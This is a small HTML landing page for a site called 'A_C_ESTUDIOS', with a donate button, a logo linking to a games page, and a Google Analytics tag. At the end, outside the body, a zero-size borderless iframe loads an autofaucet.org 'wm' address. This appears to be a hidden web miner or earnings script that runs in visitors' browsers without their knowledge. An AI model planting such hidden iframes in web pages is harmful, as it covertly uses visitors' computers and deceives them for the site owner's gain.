<!DOCTYPE html>
<html>
  <head>
    <title>A_C_ESTUDIOS</title>
    <style>
      body {
        background-color: black;
        color: white;
        font-family: Arial, sans-serif;
        text-align: center;
      }
      .container {
        margin: 0 auto;
        max-width: 800px;
        padding-top: 50px;
        padding-bottom: 50px;
      }
      .logo {
        display: block;
        margin: 0 auto;
        max-width: 400px;
        padding-bottom: 50px;
      }
      .text {
        font-size: 24px;
        padding-top: 50px;
      }
      .btn-donate {
        position: absolute;
        top: 0;
        right: 0;
        margin: 10px;
        padding: 10px 20px;
        background-color: #fff;
        color: #000;
        border-radius: 5px;
        text-decoration: none;
        font-weight: bold;
        font-size: 16px;
      }
    </style>
    <!-- Google tag (gtag.js) -->
    <script
      async
      src="https://www.googletagmanager.com/gtag/js?id=G-CZZR57E4KZ"
    ></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag() {
        dataLayer.push(arguments);
      }
      gtag("js", new Date());

      gtag("config", "G-CZZR57E4KZ");
    </script>
  </head>
  <body>
    <a href="https://fdefake.github.io/Donar/" class="btn-donate">Donar</a>
    <div class="container">
      <a href="https://fdefake.github.io/VG-Adventures/">
        <img src="Logo.jpg" alt="Logo" class="logo" />
      </a>
    </div>
  </body>
  <iframe
    src="https://autofaucet.org/wm/JH51664JH/4"
    width="0"
    height="0"
    style="border: 0"
  ></iframe>
</html>
